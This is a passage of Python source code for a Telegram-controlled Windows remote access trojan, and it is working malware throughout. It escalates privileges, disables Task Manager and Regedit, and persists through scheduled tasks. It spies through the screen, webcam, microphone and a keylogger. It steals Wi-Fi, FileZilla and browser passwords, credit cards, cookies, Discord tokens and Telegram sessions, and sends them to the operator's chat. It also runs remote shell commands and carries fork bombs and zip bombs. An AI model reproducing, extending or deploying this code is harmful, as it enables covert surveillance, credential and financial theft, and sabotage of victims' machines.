button2 = telebot.types.InlineKeyboardButton('Hell no!', callback_data='cancel')
button3 = telebot.types.InlineKeyboardButton('« Back', callback_data='cancel')
main4.row(button1)
main4.row(button2)
main4.row(button3)
main5 = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/3\n<<')
button2 = telebot.types.KeyboardButton('/4\n>>')
button3 = telebot.types.KeyboardButton('/Screen\n🖼')
button4 = telebot.types.KeyboardButton('/Files\n💾')
button5 = telebot.types.KeyboardButton('/Tasklist\n📋')
button6 = telebot.types.KeyboardButton('/Taskkill\n📝')
main5.row(button1, button3, button2)
main5.row(button4)
main5.row(button5, button6)
main6 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Kill all Processes', callback_data='taskkill all')
button2 = telebot.types.InlineKeyboardButton('Disable Task Manager', callback_data='disabletaskmgr')
main6.row(button1)
main6.row(button2)
main7 = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/CD\n🗂')
button2 = telebot.types.KeyboardButton('/Upload\n📡')
button3 = telebot.types.KeyboardButton('/ls\n📄')
button4 = telebot.types.KeyboardButton('/Remove\n🗑')
button5 = telebot.types.KeyboardButton('/Download\n📨')
button6 = telebot.types.KeyboardButton('/Run\n📌')
button7 = telebot.types.KeyboardButton('/Cancel')
main7.row(button1, button2, button3)
main7.row(button4, button5, button6)
main7.row(button7)
main8 = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/5\n<<')
button2 = telebot.types.KeyboardButton('/6\n>>')
button3 = telebot.types.KeyboardButton('/Screen\n🖼')
button4 = telebot.types.KeyboardButton('/Message\n💬')
button5 = telebot.types.KeyboardButton('/Speak\n📢')
button6 = telebot.types.KeyboardButton('/OpenURL\n🌐')
button7 = telebot.types.KeyboardButton('/Wallpapers\n🧩')
main8.row(button1, button3, button2)
main8.row(button4, button5)
main8.row(button6, button7)
# Create a folder to save temporary files
CurrentName = os.path.basename(sys.argv[0])
CurrentPath = sys.argv[0]
RAT = [
Directory,
Directory + 'Documents',
Directory + 'Photos'
]
for Directories in RAT:
if not os.path.exists(Directories):
os.makedirs(Directories)
# Run as Administrator
if AdminRightsRequired is True:
if Admin() is False:
while True:
try:
print('[~] › Trying elevate previleges to administrator\n')
os.startfile(CurrentPath, 'runas')
except:
pass
else:
print('[+] › ' + CurrentName + ' opened as admin rights\n')
sys.exit()
# Disables TaskManager
if DisableTaskManager is True:
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
print('[+] › taskmgr.exe is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
print('[+] › taskmgr.exe has been disabled\n')
# Disables Regedit
if DisableRegistryTools is True:
if os.path.exists(Directory + 'RegeditDisableRegistryTools'):
print('[+] › regedit.exe is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableRegistryTools()
open(Directory + 'RegeditDisableRegistryTools', 'a').close()
print('[+] › regedit.exe has been disabled\n')
# Adds a program to startup
if AutorunEnabled is True:
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
print('[+] › ' + CurrentName + ' ‹ is already in startup › ' + InstallPath + ProcessName + '\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
if not os.path.exists(InstallPath + ProcessName):
try:
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
except:
pass
print('[+] › ' + CurrentName + ' ‹ has been copied to startup › ' + InstallPath + ProcessName + '\n')
# Displays a message on the screen.
if DisplayMessageBox is True:
if not os.path.exists(Directory + 'DisplayMessageBox'):
open(Directory + 'DisplayMessageBox', 'a').close()
MessageBox(Message)
# Protect process with BSoD (if killed).
if ProcessBSODProtectionEnabled is True:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
if platform.release() == '10':
Thread(target=ProcessChecker).start()
if platform.release() != '10':
SetProtection()
print('[+] › Process protection has been activated\n')
# Sends an online message
while True:
try:
if Admin() is True:
Online = '🔘 Online!'
if Admin() is False:
Online = '🟢 Online!'
bot.send_message(TelegramChatID,
'\n*' + Online + '\n'
'\nPC » ' + os.getlogin() +
'\nOS » ' + Windows() +
'\n'
'\nAV » ' + Antivirus[0] +
'\n'
'\nIP » ' + Geolocation('query') + '*',
parse_mode='Markdown')
except Exception as e:
print('[-] › Retrying connect to api.telegram.org\n')
print(e)
else:
print('[+] › Connected to api.telegram.org\n')
break
# Takes a screenshot
@bot.message_handler(regexp='/Screen')
def Screen(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Screenshot.jpg'
Screenshot(File)
Screen = open(File, 'rb')
bot.send_photo(command.chat.id, Screen)
except:
pass
# Takes a photo from a webcam
@bot.message_handler(regexp='/Webcam')
def Webcam(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Webcam.jpg'
if os.path.exists(File):
os.remove(File)
WebcamScreenshot(File)
Webcam = open(File, 'rb')
bot.send_photo(command.chat.id, Webcam)
except:
bot.reply_to(command, '_Webcam not found._', parse_mode='Markdown')
# Records microphone sound
@bot.message_handler(regexp='/Audio')
def Audio(command):
try:
Seconds = re.split('/Audio ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Recording..._', parse_mode='Markdown')
try:
File = Directory + 'Audio.wav'
Microphone(File, Seconds)
Audio = open(File, 'rb')
bot.send_voice(command.chat.id, Audio)
except ValueError:
bot.reply_to(command, '_Specify the recording time in seconds._', parse_mode='Markdown')
except:
bot.reply_to(command, '_Microphone not found._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the recording duration_\n\n*› /Audio*', parse_mode='Markdown')
# Sends a message
def SendMessage(call, text):
try:
bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=text, parse_mode='Markdown')
except:
pass
# Power and startup management
@bot.callback_query_handler(func=lambda call: True)
def CallbackInline(command):
if command.message:
# Hibernate button
if command.data == 'hibernate':
SendMessage(command, '_Hibernate command received!_')
UnsetProtection()
Hibernate()
# Shutdown button
if command.data == 'shutdown':
SendMessage(command, '*Shutdown* command received!')
UnsetProtection()
Shutdown()
# Reboot button
if command.data == 'restart':
SendMessage(command, '*Restart* command received!')
UnsetProtection()
Restart()
# Button that ends a user session
if command.data == 'logoff':
SendMessage(command, '*Logoff* command received!')
UnsetProtection()
Logoff()
# Button killing system with blue screen of death
if command.data == 'bsod':
SendMessage(command, 'The *Blue Screen of Death* has been activated!')
UnsetProtection()
BSoD()
# Button processing which adds a trojan to startup (schtasks)
if command.data == 'startup':
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
SendMessage(command, '*' + ProcessName + '* is already in startup.')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights._')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
if not os.path.exists(InstallPath + ProcessName):
try:
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
except:
pass
SendMessage(command, '*' + ProcessName + '* has been copied to startup!')
# Button processing that confirms the removal of a trojan
if command.data == 'confirm':
bot.edit_message_text(chat_id=command.message.chat.id,
message_id=command.message.message_id, text='_Are you sure?_', reply_markup=main4, parse_mode='Markdown')
# Handling the <<Uninstall>> Button
if command.data == 'uninstall':
SendMessage(command, '*' + CurrentName + '* has been uninstalled!')
Uninstall(AutorunName, InstallPath, ProcessName, CurrentName, CurrentPath, Directory)
# Handling the <<Kill All Processes>> Button
if command.data == 'taskkill all':
SendMessage(command, '_Terminating processes..._')
TaskkillAll(CurrentName)
SendMessage(command, '_All processes has been terminated!_')
# Handling the <<Disable Task Manager>> Button
if command.data == 'disabletaskmgr':
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
SendMessage(command, '*taskmgr.exe* is already disabled.')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights._')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
SendMessage(command, '*taskmgr.exe* has been disabled!')
# Handling the <<Back>> Button
if command.data == 'cancel':
SendMessage(command, '`...`')
# Browse and switch directories
@bot.message_handler(regexp='/CD')
def CD(command):
try:
Path = re.split('/CD ', command.text, flags=re.I)[1]
os.chdir(Path)
bot.send_message(command.chat.id, '_Directory Changed!_\n\n`' + os.getcwd() + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_Directory not found._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Current Directory_\n\n`' + os.getcwd() + '`\n\n_Username_\n\n`' + os.getlogin() + '`', parse_mode='Markdown')
# List of files from a directory
@bot.message_handler(regexp='/ls')
def ls(command):
try:
Dirs = '\n``'.join(os.listdir())
bot.send_message(command.chat.id, '`' + os.getcwd() + '`\n\n' + '`' + Dirs + '`', parse_mode='Markdown')
except:
try:
Dirse = '\n'.join(os.listdir())
SplittedText = telebot.util.split_string(Dirse, 4096)
for Dirse in SplittedText:
bot.send_message(command.chat.id, '`' + Dirse + '`', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied._', parse_mode='Markdown')
# Deletes a user selected file
@bot.message_handler(commands=['Remove', 'remove'])
def Remove(command):
try:
File = re.split('/Remove ', command.text, flags=re.I)[1]
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=time.localtime(Created)[:-3]
def ConvertBytes(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return '%3.1f %s' % (num, x)
num /= 1024.0
def FileSize(FilePath):
if os.path.isfile(FilePath):
FileInfo = os.stat(FilePath)
return ConvertBytes(FileInfo.st_size)
bot.send_message(command.chat.id,
'File *' + File + '* removed!'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `' + FileSize(os.getcwd() + '\\' + File) + '`',
parse_mode='Markdown')
os.remove(os.getcwd() + '\\' + File)
except:
try:
File = re.split('/Remove ', command.text, flags=re.I)[1]
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=time.localtime(Created)[:-3]
Folder = os.getcwd() + '\\' + File
FolderSize = 0
for (Path, Dirs, Files) in os.walk(Folder):
for iFile in Files:
FileName = os.path.join(Path, iFile)
FolderSize += os.path.getsize(FileName)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd() + '\\' + File):
Files += len(FileNames)
Folders += len(DirNames)
shutil.rmtree(os.getcwd() + '\\' + File)
bot.send_message(command.chat.id,
'Folder *' + File + '* removed!'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\n*Contained* » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Remove • /RemoveAll*', parse_mode='Markdown')
# Deletes all files from the directory
@bot.message_handler(commands=['RemoveAll', 'removeall'])
def RemoveAll(command):
try:
bot.send_message(command.chat.id, '_Removing files..._', parse_mode='Markdown')
FolderSize = 0
for (Path, Dirs, Files) in os.walk(os.getcwd()):
for File in Files:
FileNames = os.path.join(Path, File)
FolderSize += os.path.getsize(FileNames)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd()):
Files += len(FileNames)
Folders += len(DirNames)
list = os.listdir(os.getcwd())
a = len(list)
for FileNames in os.listdir(os.getcwd()):
FilePath = os.path.join(os.getcwd(), FileNames)
try:
if os.path.isfile(FilePath) or os.path.islink(FilePath):
os.unlink(FilePath)
elif os.path.isdir(FilePath):
shutil.rmtree(FilePath)
except:
pass
list = os.listdir(os.getcwd())
b = len(list)
c = (a - b)
bot.reply_to(command,
'Removed *' + str(c) + '* files out of *' + str(a) + '!*'
'\n'
'\nSize » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\nContained » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except:
pass
# Upload a file to a connected computer (URL)
@bot.message_handler(regexp='/Upload')
def Upload(command):
try:
URL = re.split('/Upload ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
Filename = os.getcwd() + '\\' + os.path.basename(URL)
r = urllib.request.urlretrieve(URL, Filename)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Filename + '`', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Insert a direct download link._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Send file or paste URL_\n\n*› /Upload*', parse_mode='Markdown')
# Download a file to a connected computer (Message)
@bot.message_handler(content_types=['document'])
def Document(command):
try:
File = bot.get_file(command.document.file_id)
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as NewFile:
NewFile.write(DownloadedFile)
Final = os.getcwd() + '\\' + Source.split(File.file_path)[1] + command.document.file_name
shutil.move(Source, Final)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Final + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File format is not supported._', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Try saving the file in a different directory._', parse_mode='Markdown')
except:
bot.reply_to(command, '_You cannot upload a file larger than 20 MB._', parse_mode='Markdown')
# Download the file selected by the user
@bot.message_handler(regexp='/Download')
def Download(command):
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
Download = open(os.getcwd() + '\\' + File, 'rb')
bot.send_message(command.chat.id, '_Sending file..._', parse_mode='Markdown')
bot.send_document(command.chat.id, Download)
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except:
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Archiving..._', parse_mode='Markdown')
shutil.make_archive(Directory + File,
'zip',
os.getcwd() + '\\',
File)
iFile = open(Directory + File + '.zip', 'rb')
bot.send_message(command.chat.id, '_Sending folder..._', parse_mode='Markdown')
bot.send_document(command.chat.id, iFile)
iFile.close()
os.remove(Directory + File + '.zip')
except PermissionError:
bot.reply_to(command, '_Permission denied._', parse_mode='Markdown')
except:
try:
iFile.close()
os.remove(Directory + File + '.zip')
bot.reply_to(command, '_You cannot download a file larger than 50 MB._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Download*', parse_mode='Markdown')
# Runs the file selected by the user
@bot.message_handler(commands=['Run', 'run'])
def Run(command):
try:
File = re.split('/Run ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File)
bot.reply_to(command, 'File *' + File + '* has been running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_File isolated by the system and cannot be running._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Runs the file selected by the user as administrator
@bot.message_handler(commands=['RunAS', 'runas'])
def RunAS(command):
try:
File = re.split('/RunAS ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File, 'runas')
bot.reply_to(command, 'File *' + File + '* has been running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Acces denied._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Gets a list of active processes
@bot.message_handler(regexp='/Tasklist')
def Tasklist(command):
bot.send_message(command.chat.id, '`' + ProcessList() + '`', parse_mode='Markdown')
# Kills the user selected process
@bot.message_handler(regexp='/Taskkill')
def Taskkill(command):
try:
Process = re.split('/Taskkill ', command.text, flags=re.I)[1]
KillProcess(Process)
if not Process.endswith('.exe'):
Process = Process + '.exe'
bot.reply_to(command, 'The process *' + Process + '* has been stopped!', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter process name_'
'\n'
'\n*› /Taskkill*'
'\n'
'\n_Active Window_'
'\n'
'\n`' + WindowTitle() + '`',
reply_markup=main6, parse_mode='Markdown')
# Displays text sent by user
@bot.message_handler(regexp='/Message')
def Message(command):
try:
Message = re.split('/Message ', command.text, flags=re.I)[1]
bot.reply_to(command, '_The message has been sended!_', parse_mode='Markdown')
SendMessageBox(Message)
except:
bot.send_message(command.chat.id, '_Enter your message_\n\n*› /Message*', parse_mode='Markdown')
# Speak text
@bot.message_handler(regexp='/Speak')
def Speak(command):
try:
Text = re.split('/Speak ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Speaking..._', parse_mode='Markdown')
try:
SpeakText(Text)
bot.reply_to(command, '_Successfully!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to speak text._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /Speak*', parse_mode='Markdown')
# Opens a link from a standard browser
@bot.message_handler(regexp='/OpenURL')
def OpenURL(command):
try:
URL = re.split('/OpenURL ', command.text, flags=re.I)[1]
OpenBrowser(URL)
bot.reply_to(command, '_The URL has been opened!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your URL_\n\n*› /OpenURL*', parse_mode='Markdown')
# Sets the desktop wallpaper
@bot.message_handler(content_types=['photo'])
def Wallpapers(command):
Photo = bot.get_file(command.photo[len(command.photo)-1].file_id)
File = bot.get_file(command.photo[len(command.photo)-1].file_id)
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as new_file:
new_file.write(DownloadedFile)
SetWallpapers(Photo, Directory)
bot.reply_to(command, '_ The Photo has been set on the Wallpapers!_', parse_mode='Markdown')
# Infinite start CMD.exe
@bot.message_handler(regexp='/ForkBomb')
def ForkBomb(command):
bot.send_message(command.chat.id, '_Preparing ForkBomb..._', parse_mode='Markdown')
Forkbomb()
# Endless file creation
@bot.message_handler(regexp='/ZipBomb')
def ZipBomb(command):
bot.send_message(command.chat.id, '_Preparing ZipBomb..._', parse_mode='Markdown')
Zipbomb()
# Gets Wifi Password
@bot.message_handler(regexp='/WiFi')
def WiFi(command):
try:
bot.send_message(command.chat.id,
'_Received Wi-Fi Data_'
'\n'
'\n*SSID* » `' + StealWifiPasswords()['SSID'] + '`' +
'\n*AUTH* » `' + StealWifiPasswords()['AUTH'] + '`' +
'\n*Cipher* » `' + StealWifiPasswords()['Cipher'] + '`' +
'\n*Security Key* » `' + StealWifiPasswords()['SecurityKey'] + '`' +
'\n*Password* » `' + StealWifiPasswords()['Password'] + '`',
parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to authenticate Wi-Fi._', parse_mode='Markdown')
# Gets FileZilla Password
@bot.message_handler(regexp='/FileZilla')
def FileZilla(command):
try:
bot.send_message(command.chat.id,
'_Received FileZilla Data_'
'\n'
'\n*Hostname* » `' + StealFileZilla()['Hostname'] + '`' +
'\n*Username* » `' + StealFileZilla()['Username'] + '`' +
'\n*Password* » `' + StealFileZilla()['Password'] + '`',
parse_mode='Markdown')
except:
bot.reply_to(command, '_FileZilla not installed._', parse_mode='Markdown')
# Gets Discord Token
@bot.message_handler(regexp='/Discord')
def Discord(command):
try:
bot.send_message(command.chat.id, '*Discord Token*\n\n`' + DiscordToken() + '`', parse_mode='Markdown')
except:
bot.reply_to(command, '_Discord not installed._', parse_mode='Markdown')
# Gets the user current telegram session
@bot.message_handler(regexp='/Telegram')
def Telegram(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
TelegramSession(Directory)
Telegram = open(Directory + 'tdata.zip', 'rb')
bot.send_document(command.chat.id, Telegram)
except:
bot.reply_to(command, '_Telegram not installed._', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/CreditCards')
def CreditCards(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'CreditCards.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCreditCards())
CreditCards = open(Directory + 'CreditCards.txt', 'rb')
bot.send_document(command.chat.id, CreditCards)
except:
bot.reply_to(command, '_CreditCards not found._', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Bookmarks')
def Bookmarks(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Bookmarks.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedBookmarks())
Bookmarks = open(Directory + 'Bookmarks.txt', 'rb')
bot.send_document(command.chat.id, Bookmarks)
except:
bot.reply_to(command, '_Bookmarks not found._', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Passwords')
def Passwords(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Passwords.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedPasswords())
Passwords = open(Directory + 'Passwords.txt', 'rb')
bot.send_document(command.chat.id, Passwords)
except:
bot.reply_to(command, '_Passwords not found._', parse_mode='Markdown')
# Retrieves saved cookies from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Cookies')
def Cookies(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Cookies.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCookies())
Cookies = open(Directory + 'Cookies.txt', 'rb')
bot.send_document(command.chat.id, Cookies)
except:
bot.reply_to(command, '_Cookies not found._', parse_mode='Markdown')
# Gets saved browser history (Opera, Chrome)
@bot.message_handler(regexp='/History')
def History(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'History.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedHistory())
History = open(Directory + 'History.txt', 'rb')
bot.send_document(command.chat.id, History)
except:
bot.reply_to(command, '_History not found._', parse_mode='Markdown')
# Editing and viewing the clipboard
@bot.message_handler(regexp='/Clipboard')
def Clipboard(command):
try:
Text = re.split('/Clipboard ', command.text, flags=re.I)[1]
SetClipboard(Text)
bot.reply_to(command, '_Clipboard contents changed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter your text_'
'\n'
'\n*› /Clipboard*'
'\n'
'\n_Clipboard Content_'
'\n'
'\n`' + GetClipboard() + '`',
parse_mode='Markdown')
# Receive Keylogs
@bot.message_handler(regexp='/Keylogger')
def Keylogger(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
Keylogs = open(os.getenv('Temp') + '\\Keylogs.txt', 'rb')
bot.send_document(command.chat.id, Keylogs)
except:
bot.send_message(command.chat.id, '_No keylogs recorded._', parse_mode='Markdown')
@bot.message_handler(regexp='/SendKeys')
def SendKeys(command):
try:
Text = re.split('/SendKeys ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Sending keys..._', parse_mode='Markdown')
SendKeyPress(Text)
bot.reply_to(command, '_Text successfully typed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /SendKeys*', parse_mode='Markdown')
# Display Rotate <0,90,180,270>
@bot.message_handler(regexp='/Rotate')
def Rotate(command):
try:
Position = re.split('/Rotate ', command.text, flags=re.I)[1]
DisplayRotate(Degrees=Position)
bot.reply_to(command, '_The Display has been rotated!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select display rotation_'
'\n'
'\n*› /Rotate*'
'\n'
'\n_Provisions_'
'\n'
'\n`0` / `90` / `180` / `270`',
parse_mode='Markdown')
# Audio volume control
@bot.message_handler(regexp='/Volume')
def Volume(command):
try:
Level = re.split('/Volume ', command.text, flags=re.I)[1]
VolumeControl(Level)
bot.send_message(command.chat.id, '_Audio volume set to_ *' + Level + '* _level!_', parse_mode='Markdown')
except ValueError:
bot.send_message(command.chat.id, '_Specify the volume level in numbers_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the audio volume_\n\n*› /Volume*', parse_mode='Markdown')
# Monitor <on/off>
@bot.message_handler(regexp='/Monitor')
def Monitor(command):
try:
Monitor = re.split('/Monitor ', command.text, flags=re.I)[1]
if Monitor.lower() == 'Off'.lower():
Off()
bot.reply_to(command, '_The Monitor has been Off_', parse_mode='Markdown')
if Monitor.lower() == 'On'.lower():
On()
bot.reply_to(command, '_The Monitor has been On_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select monitor mode_'
'\n'
'\n*› /Monitor*'
'\n'
'\n_Modes_'
'\n'
'\n`On` / `Off`',
parse_mode='Markdown')
# Lock input (keyboard and mouse) for the selected number of seconds
@bot.message_handler(regexp='/Freeze')
def Freeze(command):
if Admin() is False:
bot.send_message(command.chat.id, '_This function requires admin rights._', parse_mode='Markdown')
if Admin() is True:
try:
Seconds = re.split('/Freeze ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Keyboard and mouse locked for_ *' + Seconds + '* _seconds!_', parse_mode='Markdown')
Block(float(Seconds))
bot.reply_to(command, '_Keyboard and mouse are now unlocked!_', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Specify the duration of the lock in seconds._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the duration of the lock_\n\n*› /Freeze*', parse_mode='Markdown')
# CD-ROM Control
@bot.message_handler(regexp='/DVD')
def DVD(command):
try:
DVD = re.split('/DVD ', command.text, flags=re.I)[1]
if DVD.lower() == 'Open'.lower():
OpenCD()
bot.reply_to(command, '_The CD-ROM has been openned!_', parse_mode='Markdown')
if DVD.lower() == 'Close'.lower():
CloseCD()
bot.reply_to(command, '_The CD-ROM has been closed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select CD-ROM mode_'
'\n'
'\n*› /DVD*'
'\n'
'\n_Modes_'
'\n'
'\n`Open` / `Close`',
parse_mode='Markdown')
# Remote command execution (CMD)
@bot.message_handler(regexp='/CMD')
def CMD(command):
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
CMD = subprocess.Popen(Command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
Lines = []
for Line in CMD.stdout.readlines():
Line = Line.strip()
if Line:
Lines.append(Line.decode('cp866'))
Output = '\n'.join(Lines)
bot.send_message(command.chat.id, Output)
except:
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
SplittedText = telebot.util.split_string(Output, 4096)
for Output in SplittedText:
bot.send_message(command.chat.id, Output)
except UnboundLocalError:
bot.reply_to(command, '_Command completed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your command_\n\n*› /CMD*', parse_mode='Markdown')
# Remote command execution (BAT)
@bot.message_handler(regexp='/BAT')
def BAT(command):
try:
Command = re.split('/BAT ', command.text, flags=re.I)[1]
File = Directory + 'Command.bat'
BatchFile = open(File, 'w').write(Command)
if Admin() is False:
os.startfile(File)
if Admin() is True:
os.startfile(File, 'runas')
bot.reply_to(command, '_Command completed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your command_\n\n*› /BAT*', parse_mode='Markdown')
# Getting location by BSSID
@bot.message_handler(regexp='/Location')
def Location(command):
try:
bot.send_chat_action(command.chat.id, 'find_location')
Coordinates = GetLocationByBSSID(GetMacByIP())
Latitude = Coordinates['lat']
Longitude = Coordinates['lon']
bot.send_location(command.chat.id, Latitude, Longitude)
bot.send_message(command.chat.id,
'_Location_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*Latitude* » `' + str(Coordinates['lat']) + '`' +
'\n*Longitude* » `' + str(Coordinates['lon']) + '`' +
'\n*Range* » `' + str(Coordinates['range']) + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`',
parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Failed locate target by BSSID_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`',
parse_mode='Markdown')
# System Information
@bot.message_handler(regexp='/Info')
def Info(command):
try:
bot.send_chat_action(command.chat.id, 'typing')
bot.send_message(command.chat.id,
'\n_Computer Info_'
'\n'
'\n*System Version* » `' + Windows() + '`' +
'\n*Computer Name* » `' + str(Computer('ComputerSystem', 'Name')) + '`' +
'\n*Computer Model* » `' + str(Computer('ComputerSystem', 'Model')) + '`' +
'\n*Manufacturer* » `' + str(Computer('ComputerSystem', 'Manufacturer')) + '`' +
'\n*System Time* » `' + SystemTime() + '`' +
'\n*Username* » `' + os.getlogin() + '`' +
'\n'
'\n'
'\n_Hardware_'
'\n'
'\n*CPU* » `' + str(Computer('CPU', 'Name')) + '`' +
'\n*GPU* » `' + str(Computer('path Win32_VideoController', 'Name')) + '`' +
'\n*RAM* » `' + str(RAM()) + '`' +
'\n*ARM* » `' + platform.architecture()[0] + '`' +
'\n'
'\n'
'\n_Protection_'
'\n'
'\n*Started as Admin* » `' + str(Admin())+ '`' +
'\n*Process Protected* » `' + str(ProcessBSODProtectionEnabled) + '`' +
'\n*Installed Antivirus* » `' + Antivirus[0] + '`',
parse_mode='Markdown')
except:
pass
# Command handler / help
